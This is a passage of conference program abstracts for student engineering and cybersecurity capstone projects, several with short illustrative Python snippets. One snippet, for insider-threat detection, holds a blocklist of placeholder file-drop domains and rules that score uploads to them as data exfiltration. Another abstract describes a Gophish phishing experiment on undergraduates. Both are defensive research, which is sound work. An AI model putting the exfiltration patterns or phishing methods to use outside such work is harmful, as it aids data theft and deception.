Ver offers a therapeutic treatment option for strabismus patients. Virtual reality (VR) technology is currently utilized in other ocular therapies, but this technology has not been applied to strabismus. Our software restores binocular vision to the user by utilizing their desired focal point and translating the image appropriately to the strabismus-affected eye on the OLED screen. The desired focal point is acquired through the eye-tracking capabilities of the Vive Pro Eye VR system. This system was chosen based on its ability to track both eyes independently instead of solely aggregating the approximate eye data.

Created by an undergraduate team of systems, electrical, and computer engineering students at the University of Pennsylvania, the corrective software is built in Unity, and proof-of-concept data has shown this solution can improve strabismic patients’ vision. Current work involves further validation testing with hardware integration. Future instantiations of the design will require GPU-based computation rather than the current CPU-based computation to allow the software to run with a processing latency under 30 milliseconds. This design limitation is due to project constraints concerning the ownership of the GPU API for the hardware system and the University of Pennsylvania’s senior design budget.

Strabismus surgery costs $8,000 on average with insurance, which does not include aftercare and necessary follow-up appointments (Sarantakos, 2019). Eye patch therapy costs vary depending on the rigor of the schedule and whether vision-impeding drops are required for the dominant eye. Other home VR optical training device packages charge $8,000 and are not designed for strabismus correction, nor are they always ophthalmologist-recommended (Virtual Reality, n.d.). Due to inadequate and expensive treatment options for strabismus patients, there is an apparent need in the market with an established opportunity for adoption and success within the therapeutic field.

The future development of this product would allow ophthalmologists to administer the therapy in-office by tuning a correction parameter to increase the involvement of the non-dominant eye. Over time, this correction parameter would be decreased as the muscles in the affected, weak eye become stronger and develop, treating strabismus through a less painful patient process.

10:30
Mallory Jones (George Mason University, United States)
Misbah Abdul-Khadir (George Mason University, United States)
Ethan Farmer (George Mason University, United States)
Varun Kripanandan (George Mason University, United States)
Sprint Performance Training System

ABSTRACT. Running sounds simple, but it’s a complex biomechanical process impacted by a number of factors. Since races are completed in about ten seconds, it’s difficult for coaches to see differences in biomechanics and recommend improvements. The only data available to sprinters and coaches are their end race times. These bottlenecks decrease the quality of sprinting and coaching and delay improvement of race times. There’s a need for data on races to increase coaches’ knowledge of what’s happening during their athletes’ sprints. This data includes acceleration, velocity, maximum velocity, and stride length and frequency. The Sprint Performance Training System addresses these problems at the high school and college levels. The concept of operations for the sprinting season begins with the athlete establishing a baseline sprint that the coach uses to create a training plan. After the athlete trains and competes, the coach updates the training plan and makes subjective recommendations. The device aids the coaching and sprinting processes by providing velocity graphs, phases, and stride frequencies of the races, which the coach can use to make objective recommendations, identify corrections, and update training plans. Requirements define the accuracy and reliability of the device, which includes a clock, an Inertial Measurement Unit (IMU), a Global Positioning System (GPS) receiver, and a Secure Digital (SD) storage card to record the sprinter’s acceleration, position, and time. It analyzes this data to output velocity, stride length and frequency, and maximum velocity, and displays this data on various graphs. Three verification tests have been completed. A drop test was conducted to verify the accuracy of the IMU sensor by dropping the device 1.5 meters five times and taking videos of each drop to be analyzed in Tracker. The actual average acceleration and terminal velocity were measured to be 9.07 m/s² and 4.59 m/s respectively, compared to the theoretical values of 9.8 m/s² and 3.14 m/s. This test will be repeated with an increased sample rate from the sensor. A surveyed position test was conducted on an NCAA track to verify GPS accuracy. The GPS device recorded latitude and longitude for one hour at each of two locations 100 meters apart on the track. The distributions at both locations were obtained, and the mean error found was 3.5 meters with a standard deviation of 4.91 meters. The verification test for a sprint was conducted with a surrogate sensor until the GPS/IMU device is available. The difference between the velocity of the surrogate sensor and the velocity obtained from Tracker-analyzed videos over 20-meter segments ranged from 9% to 35%. Changes to the verification test will be made for the next test. The device is projected to be sold for $100/unit with an anticipated profit of $35/unit. It will be sold by brick-and-mortar vendors, online, and to athletic programs. Sales are assumed to grow slowly and start to level off at around 10% of the targeted market of 231,000 athletes in 5 years. The ROI is 49.98% and the break-even point is 1.18 years into production.
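
As a sketch of the device’s velocity output, the snippet below integrates a recorded acceleration trace into velocity with the trapezoid rule; the sample rate and acceleration profile are placeholders, not data from the prototype.

```python
import numpy as np

def velocity_from_accel(accel: np.ndarray, sample_rate_hz: float) -> np.ndarray:
    """Integrate forward acceleration (m/s^2) into velocity (m/s) with the
    trapezoid rule, assuming the sprinter starts from rest."""
    dt = 1.0 / sample_rate_hz
    v = np.zeros_like(accel)
    v[1:] = np.cumsum((accel[1:] + accel[:-1]) / 2.0) * dt
    return v

# Placeholder: 3 s of data at 100 Hz ramping from 8 m/s^2 toward 0 (drag/fatigue).
accel = np.linspace(8.0, 0.0, 300)
v = velocity_from_accel(accel, 100.0)
print(f"peak velocity ~ {v.max():.2f} m/s")  # roughly 12 m/s for this synthetic profile
```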

11:00
Ryan Chan (TWSS, United States)
Alexander Danchak (TWSS, United States)
Richa Malhotra (TWSS, United States)
Enhanced Amber Alerting System

ABSTRACT. Tracking software has been applied to a wide variety of problems, such as locating lost individuals or pets. Most trackers today tend to rely on the Global Positioning System (GPS) for geolocation data of real-time positions. However, GPS has two main limitations: limited signal reception and limited battery life. With these two limitations, GPS is not a viable solution for locating lost or kidnapped children, pets, people with Alzheimer’s, or other lost individuals. TWSS intends to avoid the limitations of GPS through the creation of a tracking application system that uses Bluetooth crowdsourcing. This tracking application system will trilaterate Bluetooth beacons worn by individuals. TWSS’s system would allow for tracking that does not rely entirely on GPS. Rather, TWSS’s system would use crowdsourced location data from a network of smartphones running TWSS’s applications.

The GMU team has developed this tracking application system starting with the Bluetooth sensor. This device was developed to send out TWSS-specific Bluetooth beacons that can be received by a network of smartphones trying to locate its position. These smartphones run a background application, also known as the parasite application, that is capable of filtering through Bluetooth traffic for TWSS Bluetooth beacons. Once a background application receives a TWSS Bluetooth beacon, the smartphone sends the location data needed to locate the Bluetooth sensor to a server via an API. Using the information provided by the network of background applications, the server pulls the necessary information from the database as input to the team’s geolocation algorithm. Once the sensor’s location is computed, it is output to a parent application that displays the location on a map to help the user find the missing individual or pet the sensor is attached to.
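
A hedged sketch of the geolocation step: least-squares trilateration of a beacon from distance estimates reported by three or more phones, in a local flat x/y frame in meters. The anchor positions and distances are placeholders, and the production algorithm and its inputs may differ.

```python
import numpy as np

def trilaterate(anchors: np.ndarray, distances: np.ndarray) -> np.ndarray:
    """Estimate a 2-D beacon position from anchor positions (n x 2, meters)
    and measured distances (n,), by linearizing against the first anchor."""
    d1 = distances[0]
    A = 2 * (anchors[1:] - anchors[0])
    b = (d1**2 - distances[1:]**2
         + np.sum(anchors[1:]**2, axis=1) - np.sum(anchors[0]**2))
    pos, *_ = np.linalg.lstsq(A, b, rcond=None)
    return pos

# Three phones at known positions; distances estimated from Bluetooth RSSI (placeholders).
phones = np.array([[0.0, 0.0], [30.0, 0.0], [0.0, 40.0]])
dists = np.array([25.0, 25.5, 31.0])
print(trilaterate(phones, dists))  # approximate beacon coordinates in the local frame
```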

09:00-12:00 Session 1D: Network Security
Chair:
Rock Sabetto (George Mason University, United States)
09:00
Malay Patel (George Mason University, United States)
Kelvin Nguyen (George Mason University, United States)
Harsimran Ruprai (George Mason University, United States)
Justin Luu (George Mason University, United States)
Akshith Bandam (George Mason University, United States)
Automated Web Proxy-Data Leakage Analysis

ABSTRACT. Insider threats are one of the most difficult aspects to address in the field of cyber security. Small businesses struggle to detect insider threat activities within their organizations due to the lack of automation in collecting and analyzing web proxy data. This analysis of log data currently requires manual collection and examination by human analysts, which is inefficient. This inefficiency is caused by the exhaustive effort of analyzing the proxy logs line by line each day, which results in an inaccurate assessment of the data. Sponsored by Verizon, the team was requested to develop an automated alternative to the manual log analysis process to detect insider threats. To meet Verizon’s need, this project first provides an automated process for collecting the Apache web proxy data. This project further provides the capability to distinguish between malicious and non-malicious activities based on the insider threat criteria defined by the team. The developed tool is delivered as a web-based application. This web-based application is hosted in the AWS cloud for the purposes of achieving reliability and flexibility. This web application utilizes AWS instances that host the web proxy, database, and webserver. For the web proxy, a Perl script parses the Apache web proxy logs, and a Bash script automates the collection and transfer of the logs to the database on a routine basis. For the database, NoSQL MongoDB stores the transferred proxy log data. For the webserver, Node.js and React.js help to develop the web Graphical User Interface (GUI). The end users pass through the company’s proxy server prior to accessing the Internet, which is part of the proxy log collection. Once authenticated, security analysts can access the GUI via a web browser to analyze the web proxy data. Based on pre-packaged rules selected by the analysts, the database can be queried to return the log data. The analysts can use the results to predict potential insider threats within the organization. These results are evaluated using a team-generated risk scoring metric that provides a score for each host based on predetermined insider threat parameters. In order to verify the tool works as designed, a large set of dummy web proxy logs was created to emulate realistic proxy logs generated within a small business environment. This set contains proxy logs for thirty distinct users, spread over a nine-day range, with a majority of the web requests being made during typical workday hours. Within the set, seven random users are chosen to act as malicious insider users. The web proxy logs are modified for the seven malicious users to show that they are often visiting malicious webpages. Based on this, they will exceed the risk score threshold to qualify as insider threats. All generated insider threat activities are recorded and stored in a spreadsheet. The results of the tool are then compared with the spreadsheet to validate that the results are accurate. Overall, this project demonstrates a tool that is able to successfully automate and provide highly accurate insider threat detection within small businesses.
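
A simplified sketch of two core steps, parsing a proxy log line and scoring a host against an insider-threat rule set; the regex targets the Apache combined log format, and the blocklist and scoring weights are placeholders. The delivered tool itself uses Perl/Bash collection, MongoDB storage, and a Node.js/React GUI.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+')

# Placeholder rule set: indicator weights and blocklist, not the team's actual criteria.
BLOCKLIST = {"paste-site.example", "file-drop.example"}
WEIGHTS = {"blocklisted_domain": 5, "off_hours": 2, "upload_method": 3}

def score(lines):
    """Accumulate a per-user risk score from parsed proxy log lines."""
    risk = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        user, url, method = m["user"], m["url"], m["method"]
        if any(dom in url for dom in BLOCKLIST):
            risk[user] += WEIGHTS["blocklisted_domain"]
        hour = int(m["time"].split(":")[1])
        if hour < 6 or hour > 20:
            risk[user] += WEIGHTS["off_hours"]
        if method in ("PUT", "POST"):
            risk[user] += WEIGHTS["upload_method"]
    return dict(risk)

sample = ['10.0.0.5 - alice [27/Apr/2020:23:14:02 -0400] '
          '"POST http://file-drop.example/up HTTP/1.1" 200 5120']
print(score(sample))  # {'alice': 10}
```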

09:30
Warrie Proffitt (George Mason University, United States)
Hebah Beg (George Mason University, United States)
Jordan Poole (George Mason University, United States)
Cyber Attack Map

ABSTRACT. As the world continues to become more globally connected, the need for online security becomes more important. Along with an ever-increasing global connection, the desire to visualize network traffic is in demand. By creating a cyber attack map, we hope to address this problem by providing an accessible application to aggregate and visualize network traffic. The Cyber Attack Map (CAM) will process incoming traffic that has been denied by the external firewall and present a mapping of the connection between source IP addresses and their destination IP addresses. The development team consists of Warrie Proffitt, Hebah Beg, and Jordan Poole, under the mentorship of George Mason University faculty and sponsored by Hexagon U.S. Federal. In order to complete development of the CAM, the application will be written entirely in JavaScript to properly interface with LuciadRIA, a geospatial visualization tool developed by Hexagon Geospatial. To store data associated with the incoming traffic, the team has utilized a SQLite database. Lastly, in order to properly identify the location of IP addresses, a third-party service has been integrated through asynchronous API calls. The front-end interface will display a real-time map of incoming denied IP addresses, with options for further filtering. These options will consist of filters for IP address density color-coding, the ability to sort by location (i.e. country, city, etc.), the ability to filter by firewall rules, and the ability to display a history or timeline of given IP address connections. The application will also provide zoom and drag capabilities. As the development of the application is broken into three-week sprints, verification of the source code is completed at the end of each sprint. Unit testing and routine demonstrations to the customer are the verification and validation methods our team has implemented. Unit testing is used to verify that each component of the application performs as intended, while routine demonstrations to the stakeholders allow for feedback on the application’s functionality and design. This project provides Hexagon U.S. Federal a visualization tool for analyzing potential malicious activity. With the use of LuciadRIA, our team was able to build an efficient, lightweight tool to identify the source of suspicious network activity.
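
The application itself is written in JavaScript; as a language-neutral sketch of the back-end flow, the snippet below records a denied connection with a geolocated source in SQLite. The table schema and the geolocation stub are placeholders for the real third-party lookup and LuciadRIA rendering.

```python
import sqlite3

conn = sqlite3.connect("cam.db")
conn.execute("""CREATE TABLE IF NOT EXISTS denied_traffic (
                  ts TEXT, src_ip TEXT, dst_ip TEXT, rule TEXT,
                  lat REAL, lon REAL)""")

def geolocate(ip: str) -> tuple:
    """Placeholder for the asynchronous third-party geolocation lookup."""
    return (38.83, -77.31)  # hypothetical coordinates

def record_denied(ts: str, src_ip: str, dst_ip: str, rule: str) -> None:
    """Store one firewall-denied connection along with its geolocated source."""
    lat, lon = geolocate(src_ip)
    conn.execute("INSERT INTO denied_traffic VALUES (?, ?, ?, ?, ?, ?)",
                 (ts, src_ip, dst_ip, rule, lat, lon))
    conn.commit()

record_denied("2020-04-27T09:00:00Z", "198.51.100.7", "10.1.1.5", "deny-inbound-telnet")
print(conn.execute("SELECT src_ip, lat, lon FROM denied_traffic").fetchall())
```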

10:00
Matt Glover (GMU CYSE, United States)
Humzza Raja (GMU CYSE, United States)
Karl Haessler (GMU CYSE, United States)
Winterdel Matsikure (GMU CYSE, United States)
Brennan Maynard (GMU CYSE, United States)
Countering Malicious Cyber Actors

ABSTRACT. The investigation of foreign influence during the 2016 U.S. presidential election revealed various tactics that were employed to sway public opinion and sow discord in American public discourse. These tactics have now created a sense of paranoia surrounding the trustworthiness of our sources of news. The goal of this project is to improve capabilities for identifying misinformation that would otherwise be used to influence the audience reading the news. Perspecta, an IT service management company and U.S. government contractor, has an interest in this project and is sponsoring our team, providing us guidance and resources to solve this problem. In order to address the problem, our team had to develop a concept of operations that would accommodate the necessary flexibility and the goals of our project. Our first objective was to find a dataset that would contain a large swath of news which we could examine more closely. We then gathered our own data using a software tool called ScrapeStorm and cleaned the data we collected. This dataset would then have to be processed to remove extraneous features and standardize our data. With the help of machine learning capabilities such as natural language processing, we are able to quantify various features of our data, such as readability and consistency of emotion and subject. Finally, equipped with this information, we will be able to identify and respond to misinformation to improve the lives of others. In order to verify that the model is functioning properly, we must supervise the results and fine-tune our programs and data flow. This ensures that the model aligns with the actual content. Repeating this process until we reach a satisfactory result, we will use the final model to process new sources of data we find. This can be current news and/or past news that has remained inconclusive.
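
As one concrete example of a readability feature, here is a hedged sketch of the Flesch reading-ease score with a naive syllable heuristic; the project’s actual NLP pipeline and feature definitions are not specified here.

```python
import re

def count_syllables(word: str) -> int:
    """Very rough syllable heuristic: count groups of consecutive vowels."""
    return max(1, len(re.findall(r"[aeiouy]+", word.lower())))

def flesch_reading_ease(text: str) -> float:
    """Flesch formula: 206.835 - 1.015*(words/sentences) - 84.6*(syllables/words)."""
    sentences = max(1, len(re.findall(r"[.!?]+", text)))
    words = re.findall(r"[A-Za-z']+", text)
    syllables = sum(count_syllables(w) for w in words)
    return 206.835 - 1.015 * (len(words) / sentences) - 84.6 * (syllables / len(words))

article = ("The committee released a statement today. "
           "Observers questioned the statement's accuracy and sourcing.")
print(f"Flesch reading ease: {flesch_reading_ease(article):.1f}")
```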

10:30
Te Ming Tiong (George Mason University, United States)
Abdulla Alhamer (George Mason University, United States)
Abdullah Alsaadi (George Mason University, United States)
Kristin DiMichele (George Mason University, United States)
Phishing Experiment and Analysis On User Susceptibility

ABSTRACT. In today’s technological era, phishing is considered to be one of the most serious cyber threats for organizations, because many major cyber incidents, like data breaches, start with phishing emails. Phishing is defined as a cyber attack that utilizes disguised emails as well as other forms of communication to trick people into giving up sensitive data like login credentials or other personal information. We are collaborating with George Mason University (GMU) to design a phishing campaign that will be conducted on undergraduate students to determine various factors affecting their susceptibility. We chose undergraduate students at GMU as our target instead of faculty and staff because most of the students do not have a cyber security background and are not required to undergo any rigorous security awareness training. As a requirement, it is mandatory for us to safeguard sensitive data, which in our case are the students’ email addresses; this is done by performing data de-identification processes so that all of the collected responses will be anonymous. We have divided the students into two main groups: one group will be tested on the effectiveness of incentives, while the other will be examined on the effectiveness of punishments in preventing students from being vulnerable to phishing attacks. In addition, we are going to measure the impact of two different types of phishing email templates that exploit human psychological factors and compare which one is more compelling. Gophish, an open-source phishing framework, is used for this study to send out the phishing email templates to the students through automation and to collect data about who is clicking on phishing emails. After all the data is collected and de-identified, it will be analyzed and compared to the observations made in our hypotheses. We will also provide some suggestions on remediation based on the conclusions made.
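
A sketch of one way the de-identified click data could be compared across the two groups, using a chi-square test of independence; the counts below are invented placeholders, not study results.

```python
from scipy.stats import chi2_contingency

# Hypothetical de-identified counts: [clicked, did_not_click] per group.
incentive_group = [18, 82]
punishment_group = [31, 69]

chi2, p, dof, expected = chi2_contingency([incentive_group, punishment_group])
print(f"chi2 = {chi2:.2f}, p = {p:.4f}")
if p < 0.05:
    print("Click rates differ significantly between the two conditions.")
```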

11:00
Mahesh Addanki (George Mason University, United States)
Micheal Spainhour (George Mason University, United States)
Nakiyah Wright (George Mason University, United States)
Apache NiFi IPFIX Processing

ABSTRACT. Today, technology is ever-present in commercial environments. Businesses and organizations are adding more devices to internal networks every day, and with this comes an increase in network traffic. Maintaining and securing enterprise networks at scale requires IT staff to stay informed about the changing needs of the organization rather than just maintaining the status quo. Network traffic analysis is one of the ways an IT team can observe network behavior. When analyzing network traffic, it is not critical to see the packet contents; flow metadata alone can reveal interesting information about a network, such as policy abuses, security incidents, and misconfigurations, and can establish trends in network traffic. Due to the sheer amount of data moving in a network, it has become difficult to parse through it all efficiently. Our project aims to simplify identification of trends in metadata by creating a data processor for IPFIX information using Apache NiFi. IPFIX is an open standard protocol for transmitting flow metadata across networks from exporters to collectors. Despite the existence of an open standard, many vendors utilize proprietary solutions when implementing IPFIX exporters and collectors. NiFi itself is an open source platform for data processing and distribution. Our requirements include creating a processor for the five-tuple information in the IPFIX format that supports both DNS and NTP protocol connections, initializing a scalable database solution for storage, and having an integrable Red Hat 7 infrastructure. Our project has many stakeholders, including consumers, enterprises, governmental agencies, and multi-industry vendors. By working in an Agile-based methodology, we are able to quickly provide transparent progress reports to stakeholders during the lifecycle of the project. The proposed processor utilizes CERT’s Yet Another Flowmeter and Super_Mediator to process the metadata after ingestion into NiFi. Together, these tools provide support for live captures from an interface that routes directly into NiFi, removing the need for a proprietary exporter and collector. Data processing occurs inside NiFi, as fields of interest are passed to a database for storage. Due to the particular use case as an enterprise traffic monitor, our solution must work at scale. NiFi’s method of data distribution using reference passing helps to accomplish this, alongside using a suitably powerful system for the actual processing and storage. The processor should be able to correctly identify critical information, including source and destination IP addresses, ports, and the protocol used. In order to test our data flows, we process large capture files filled with various types of network traffic. After validating the database records against the appropriate JSON files, we can classify the implementation as a success. In a business landscape application of our project, the project’s functionality and scope can be expanded to include most of the customer’s network traffic. This information is crucial to advertisement marketing campaigns, by using our project to target advertisements on frequently visited websites within certain time periods, along with cyber-security aspects such as malicious actors and malicious network use cases.
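
A sketch of the kind of five-tuple record the processor could emit for storage, together with the database comparison used in testing; the field names mirror common IPFIX information elements but are illustrative rather than the project’s exact schema.

```python
import json

# Five-tuple fields of interest (names follow IANA IPFIX information elements).
FIVE_TUPLE = ("sourceIPv4Address", "destinationIPv4Address",
              "sourceTransportPort", "destinationTransportPort", "protocolIdentifier")

def extract_five_tuple(flow_record: dict) -> dict:
    """Pull the five-tuple out of one mediated flow record for storage."""
    return {field: flow_record[field] for field in FIVE_TUPLE}

# Placeholder record, e.g. a DNS query flow after export and mediation.
flow = {"sourceIPv4Address": "192.0.2.10", "destinationIPv4Address": "192.0.2.53",
        "sourceTransportPort": 51514, "destinationTransportPort": 53,
        "protocolIdentifier": 17, "flowStartMilliseconds": 1588000000000}

record = extract_five_tuple(flow)
print(json.dumps(record))
db_row = dict(record)  # stand-in for the row later retrieved from the database
assert record == db_row, "stored record should match the parsed five-tuple"
```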

13:00-16:00 Session 2A: Decision Support Systems
Chair:
Ran Ji (George Mason University, United States)
13:00
David Pinter (West Point, United States)
David Hughes (West Point, United States)
NBA Rebound Analysis: A Study of Weak and Strong Side Rebounds with Respect to Shot Origin, Defender Proximity, and Rebounder Movement

ABSTRACT. This research first aims to test a common coaching heuristic that most rebounds go to the weak side. Using NBA player location tracking data, each shot and rebound is placed into one of sixteen zones defined by the authors. The zones of the shots and rebounds are then used to determine whether a strong-side or a weak-side rebound occurred. The numbers of strong- and weak-side rebounds are aggregated to find the rebound trend for the entire court as well as for each zone. The research then determines whether there are specific shooters whose rebound trends run contrary to the aggregate results. This analysis allows rebounders to identify and move to the zone that maximizes their likelihood of securing the rebound based on the shooter and the location of the shot. Next, shots are classified as either contested or uncontested and then analyzed to see whether rebound location trends change. Finally, the dataset is analyzed to determine rebounder movement. Analysis is conducted on the top rebounder in the league to see how active he is based on the distance traveled from his position at the time of the shot to where he secured the rebound. This allows for comparisons between top and average rebounders.
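As an illustration of the strong-side/weak-side labeling (the study's sixteen author-defined zones are not reproduced here), a simplified sketch might split the half court at the rim and compare the shot side to the rebound side; the coordinates below are invented.

# Simplified illustration only: label each rebound strong-side (same side
# as the shot) or weak-side (opposite side) by splitting the half court at
# the rim's x-coordinate. Court width and sample coordinates are assumed.
RIM_X = 25.0  # assumes a 50-ft-wide court with the rim centered at x = 25

def side(x):
    return "left" if x < RIM_X else "right"

def classify_rebound(shot_x, rebound_x):
    return "strong" if side(shot_x) == side(rebound_x) else "weak"

# (shot_x, rebound_x) pairs, invented for illustration
events = [(8.0, 40.0), (42.0, 44.0), (30.0, 12.0)]
counts = {"strong": 0, "weak": 0}
for shot_x, rebound_x in events:
    counts[classify_rebound(shot_x, rebound_x)] += 1
print(counts)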

13:30
Billal Gilani (GMU SEOR, United States)
Renzo Herrera Fallaque (GMU SEOR, United States)
Andy Tapia (GMU SEOR, United States)
Lucky Bakhtawar (GMU SEOR, United States)
George Mason University Chilled Water Decision Support System

ABSTRACT. George Mason University (GMU) utilizes a Central Heating and Cooling Plant (CHCP) to provide the Fairfax Campus with chilled water and high-temperature hot water for buildings' heating, ventilation, and air conditioning (HVAC) needs. The Chilled Water System (CWS) is powered by electricity and provides up to 11,340 tons of cooling to the campus. The CWS consists of one heat exchanger for Free Cooling, a Thermal Storage Unit (TSU), ten chillers, and ten cooling towers. Four of these chillers are purpose-built for the TSU and have two modes of operation: recharging the TSU or providing mechanical cooling.

The CWS is controlled by a semi-automatic SIEMENS control system. Decisions about configuring the CWS to meet cooling needs are made by CHCP operators, either by using SIEMENS preset settings or through heuristics, both of which are unoptimized methods of operation. CHCP operators are overseen by GMU's Environmental Quality and Efficiency (EQE) Department, which manages overall CHCP operations. Given GMU's environmental goal of reaching climate neutrality and rising temperatures due to climate change, the EQE needs a solution that meets climate goals while maximizing efficiency. In support of the EQE, the CHCP operators and supervisors need a way to better achieve this same goal and assistance in operating the CWS.

To achieve these goals, our solution combines stochastic simulation, optimization, and a 36-hour forecaster to implement a Decision Support System (DSS). The optimization builds upon a previous case study and is verified against data previously recorded at the CHCP. The DSS is intended to reduce yearly costs and on-peak electrical power purchases while meeting the campus cooling demand. The DSS uses a graphical user interface (GUI) to support operator decision-making, display forecasted conditions, and serve as a knowledge transfer medium for new operators. Design of the DSS resulted in two configurations: integration with the SIEMENS control system and a standalone configuration without it. The standalone configuration was designed to address infrastructure concerns by providing an alternative with a standalone optimization. In the integrated alternative, data is shared with the DSS to provide more accurate optimization of the CHCP.
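To illustrate the kind of decision the DSS automates, the sketch below performs a brute-force search over chiller on/off combinations to meet a forecasted cooling load at minimum electricity cost; the capacities, kW-per-ton efficiencies, and electricity rate are placeholders rather than CHCP data, and the actual DSS couples such a search to the forecaster and stochastic simulation.

# Toy configuration search: choose the on/off combination of chillers that
# covers a forecasted cooling load at the lowest electricity cost.
# Capacities, kW-per-ton figures, and the rate are placeholders only.
from itertools import product

CHILLERS = [  # (capacity in tons, efficiency in kW per ton)
    (1200, 0.60), (1200, 0.62), (2000, 0.55), (2500, 0.58),
]
RATE = 0.11  # $/kWh, placeholder

def best_configuration(load_tons, hours=1.0):
    best = None
    for on_flags in product([0, 1], repeat=len(CHILLERS)):
        capacity = sum(cap for (cap, _), on in zip(CHILLERS, on_flags) if on)
        if capacity < load_tons:
            continue  # this combination cannot meet the demand
        power_kw = sum(cap * kw_per_ton
                       for (cap, kw_per_ton), on in zip(CHILLERS, on_flags) if on)
        cost = power_kw * hours * RATE
        if best is None or cost < best[1]:
            best = (on_flags, cost)
    return best

print(best_configuration(load_tons=3000))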

A DSS to assist CHCP Operators in meeting environmental goals demonstrates progress towards meeting climate neutrality at GMU. The CHCP is a critical part of the Fairfax campus infrastructure, supplying nearly all HVAC needs to all buildings on campus. While there may be commercial solutions available to purchase, this DSS is custom designed for the specific needs of GMU, the EQE, and CHCP operators. Final software is validated by the EQE and CHCP Operators through usability testing.

14:00
Thomas Williamson (United States Military Academy, United States)
David Hughes (United States Military Academy, United States)
John Case (United States Military Academy, United States)
Ball Screen Spacing: A Study on the Positioning of Players During a Ball Screen in Relation to a Successful Possession

ABSTRACT. The National Basketball Association (NBA) utilizes advanced sports analytics to improve the game of basketball and inform coaches and players of trends within the league. The ball screen has become one of the most common actions for offenses in the NBA, drawing the attention of sports researchers. For the first time, the NBA shared player positioning data with the authors in order to research this new field of interest. Although multiple studies have analyzed the effectiveness of ball screens, none have analyzed the factor of spacing and its impact on success. This paper explores the relationship between the positioning of offensive players during a ball screen and the success of the possession by analyzing geospatial data, including the position of each offensive player during a ball screen, from approximately 40 games of five different NBA teams (which have been deidentified). The paper uses statistical tests to examine whether certain zone combinations correlate with successful possessions better than others, as well as whether the use of zone combinations differs among the five teams. Additionally, research into the impact of the origin of the screen is presented to determine whether it influences a successful possession. This analysis can be used by NBA coaches and players to inform offensive strategies and improve the way the game of basketball is played and understood.
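As a sketch of the statistical testing described above, a chi-square test of independence between zone combination and possession outcome could be run as follows; the counts are invented for illustration and are not NBA data.

# Chi-square test of independence between zone combination and possession
# outcome. The contingency table below is invented for illustration.
from scipy.stats import chi2_contingency

# rows: zone combinations A, B, C; columns: [successful, unsuccessful]
table = [
    [62, 85],
    [48, 101],
    [75, 70],
]
chi2, p_value, dof, expected = chi2_contingency(table)
print(f"chi2 = {chi2:.2f}, p = {p_value:.4f}, dof = {dof}")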

14:30
Parastou Moghaddam (George Mason University, United States)
Harkaran Singh (George Mason University, United States)
Karan Sharma (George Mason University, United States)
Noha Elissawy (George Mason University, United States)
Jeong-Joo Park (George Mason University, United States)
Composable DevOps Architecture: The Need for Secure and Flexible Deployment

ABSTRACT. By the end of 2020, 83% of enterprise IT workloads are expected to run on cloud platforms [1]. Companies are choosing to transition to cloud environments because of the many benefits associated with cloud services, including affordability, security, scalability, resiliency, and agility. Cloud computing eliminates guesswork about a company's capacity needs, as there is no need for upfront capital costs or predictions of future workloads. Underutilized on-premise hardware can be replaced by on-demand resources provided by cloud service providers (CSPs). With only a few clicks, scaling in or out, whether horizontally or vertically, can be fully automated. While cloud computing offers massive economies of scale, understanding cloud best practices well enough to enhance security and avoid vendor lock-in has been an ongoing challenge for some companies. Many strive to migrate to cloud-based technologies, but the risk of vendor lock-in is a barrier that is hard to overcome. Besides the negotiation and business strategies that all companies need to follow, designing a composable architecture whose applications can be easily decoupled and transferred from one platform to another is a key factor; in other words, application portability plays a major role in reducing the risk of proprietary lock-in. In this paper, two major cloud platforms, Amazon Web Services (AWS) and Microsoft Azure, are investigated to demonstrate best practices in cloud environments. A comprehensive analysis of creating an application exclusively from open-source tools to orchestrate a DevSecOps pipeline is illustrated. Continuous testing of the pipeline for security and functionality is verified through smoke testing, security testing, and performance testing. In addition, the containerization and deployment of applications are explored to analyze scalability and maintain efficient use of resources. The goal is to highlight the benefits of using open-source tools to optimize cost, prevent vendor lock-in, and secure the architecture.

REFERENCE

[1] Columbus, L. (2018). 83% of enterprise workloads will be in the cloud by 2020. Forbes. https://www.forbes.com/sites/louiscolumbus/2018/01/07/83-of-enterprise-workloads-will-be-in-the-cloud-by-2020/#39f45006261a
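As an illustration of the pipeline's continuous-testing stage, a minimal smoke test might simply probe a deployed service's health endpoint and fail the stage on any error; the URL below is a placeholder, not the project's actual service.

# Minimal post-deployment smoke test: hit a health endpoint and fail the
# pipeline stage on any non-200 response. The URL is a placeholder.
import sys
import requests

HEALTH_URL = "http://localhost:8080/health"  # hypothetical endpoint

def smoke_test():
    try:
        resp = requests.get(HEALTH_URL, timeout=5)
    except requests.RequestException as exc:
        print(f"smoke test failed: {exc}")
        return 1
    if resp.status_code != 200:
        print(f"smoke test failed: HTTP {resp.status_code}")
        return 1
    print("smoke test passed")
    return 0

if __name__ == "__main__":
    sys.exit(smoke_test())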

15:00
Felix Ruble (George Mason University, United States)
Katherine Graves (George Mason University, United States)
Naseem Shah (George Mason University, United States)
David Nguyen (George Mason University, United States)
Yacht Club Cash Flow Forecasting Model and Capital Investment Plan

ABSTRACT. The purpose of this project was to provide a cash flow forecasting tool and a 10-year capital investment plan to a yacht club on the Chesapeake Bay. This club has seen operating losses for the past decade and, as a result, has depleted its already limited capital reserves. Furthermore, much of the key infrastructure that the club needs to operate is either nearing or has exceeded its expected lifespan. Key high-level items that need to be replaced in the next few years include three of the four docks, five HVAC units, and the clubhouse's roof. Key stakeholders for this project included the project sponsor, the club's Long Range Planning Committee, club management and staff, club members in leadership roles, regular club members, financial institutions, competing clubs and marinas, and state and local regulatory bodies. The concept of operations for the cash flow forecasting model was to model the yacht club as a set of profit and loss centers, where each center has predefined input parameters. The model then used these parameters to calculate and forecast cash flow line items. The profit and loss centers modeled were the dock, the fuel system, the bar and restaurant, and clubhouse miscellaneous, which included general overhead items and income from member dues. The cash flow forecasting model was implemented as a desktop application with a simple graphical user interface that club leadership and management can use to produce their own cash flow forecasts. The application was developed in Python and meets the input and output requirements agreed upon with the project sponsor. The model outputs were verified by using current parameters to calculate budget items for the current year and comparing them to the same budget items in recent financial data. The model was validated by taking parameters that reflect a year in the past and forecasting income and expense items from that year to the current year. Using the cash flow forecasting tool, the team produced cost constraints for the capital investment plan based on a handful of likely scenarios. The capital investment plan was constructed using multi-attribute utility functions to calculate utility values for a broad set of investment items. The attributes used to calculate utility were visual appeal, return on investment, criticality to club operations, and environmental impact, with weights of 30%, 30%, 30%, and 10%, respectively. Finally, the team delivered the cash flow forecasting tool to the sponsor, along with a set of recommended capital 